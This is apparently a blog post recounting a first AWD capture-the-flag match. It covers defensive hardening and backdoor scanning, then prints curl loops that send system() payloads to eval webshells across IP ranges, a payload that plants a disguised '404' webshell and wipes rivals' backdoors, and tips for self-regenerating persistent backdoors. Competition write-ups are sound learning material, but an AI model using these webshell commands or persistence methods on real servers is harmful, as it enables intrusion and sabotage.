第一次玩AWD总结

第一次玩AWD总结

第一次玩AWD，全靠大佬带，自己就像流水线工人样，一直提交大佬发的 flag ?

题目就是通过别人维护的服务器 curl 一个地址拿 flag，修补自己服务器上的漏洞，防止别人拿 flag

---

使用ssh登录，如果ssh密码是弱密码，改复杂点儿，不是 root 权限。

拿到题目如果是web题的话，首先把文件全部拷贝出来，文件被别人删除了也可以快速恢复。查看相关数据库文件 .sql，数据库连接文件，修改管理员后台登录密码，设置一些向css、images、upload等目录禁用执行脚本，关注一下开放的端口，比如 如果3306开启的就要关注是不是任意IP的客户端都能连接，如果是的话就需要改下数据密码，禁用任意IP连接。注意服务器版本，是否存在解析漏洞等。

拷贝的web文件

用D盾或其它后门扫描工具扫下拷贝的文件，如果有后门文件立即删除。注意有的是误报，不要删错了导致服务不可用而扣分。也可以修改下后门文件，给别人一个假的 flag 。像下面的 5 级别的 ali.php、yijuhua.php、db.php 都是需要删除的，其它几个文件需要进一步确认是否存在漏洞。

第一波拼的就是手速，找个简单好利用的后门迅速打一波，比如这个 yijuhua.php 的 eval 后门：

测试一下:

curl "http://172.31.129.62/css/images/yijuhua.php" -d "test=system('curl http://172.21.144.37/flag.txt');"

加个循环批量获取：

for i in `seq 60 70`; do echo 172.21.129.$i:;curl -s -m 1 --connect-time 3 "http://172.31.129.$i/css/images/yijuhua.php" -d "test=system('curl http://172.21.144.37/flag.txt');" 2>/dev/null; done;

这时应该是全场最快获取到 flag 的，除非事先准备好了脚本。（由于是本地搭建的测试环境，所以只有一个 flag）

对于没有获取到的 flag 的 IP ，修改上面代码，尝试从其它后门文件获取，比如这个 db.php 文件：

#假设刚刚 61，64，68 没获取到
for i in 61 64 68; do echo 172.21.129.$i:;curl -s -m 1 "http://172.31.129.$i/plugins/youdaotrans/db.php" -d "An=system('curl http://172.21.144.37/flag.txt');" 2>/dev/null; done;

接下来用脚本新生成个新后门文件，把其他人的后门文件全部清空，防止别人获取 flag ?，下一波就用我门新生成的后门文件来获取 flag 。（走自己的路，让别人无路可走）

for i in `seq 1 255`
do 
    echo 172.21.129.$i:
    curl -s -m 1 "http://172.31.129.$i/plugins/youdaotrans/db.php" -d "An=system('echo \'<h1>404 Not Found</h1><?php @eval(system(\$_POST[test])); ?>\' >err.php;echo >db.php;');" 2>/dev/null
done

# 下一波就使用上面生成的新的后门文件来获取flag
for i in `seq 1 255`; do echo 172.21.129.$i:;curl -s -m 1 "http://172.31.129.$i/plugins/youdaotrans/err.php" -d "test=curl 172.21.144.37/flag.txt" 2>/dev/null;done;

这时如果有时间还是换成 python 脚本吧，shell 脚本执行效率太低了

建议每次获取了 flag 就可以再重新生成一个新的后门文件，并删除旧的后门文件，防止别人用我们的后门文件获取 flag，也可以不生成后门文件，用 >> 在已有的正常文件后面添加一句话后门，到后面还可以删除别人数据库连接文件等，让别人一直忙起来，没空找后门。

可以在不同的目录多留几个后门，防止被删了就没入口了或设置了该目录禁止执行脚本，然后让几个生成后门文件的脚本不停地执行，这样别人删不掉，删除了一个另一个后门脚本又马上生成，除非同时删除这多个后门文件。

awd1 awd2 基本这样就能玩到结束，awd3 不会，还在学习中，被打惨了。

---

如果D盾扫不出来，那就就只能使用扫描器或手动找了，先搜索已知漏洞，没有的话就使用 Seay 代码审计，先自动审计，找到需要关注的文件，优先关注命令执行，代码执行，文件上传

还可以去找找哪里有文件上传，看看可不可以绕过，管理员后台一般都有，所以前面要修改下后台管理员密码，随时看日志，看大佬怎么操作的，或许就能用大佬留下的后门拿一波 flag 哦

补充：在防御上还可以找点文件检测的脚本用来防护，一旦文件被修改，删除或增加马上复原，上 waf 的话注意不要对页面造成影响，防止扣分，还可以考虑下 rasp 。

还有就是大佬说的修改 curl 命令，给 curl 取个别名，表示没成功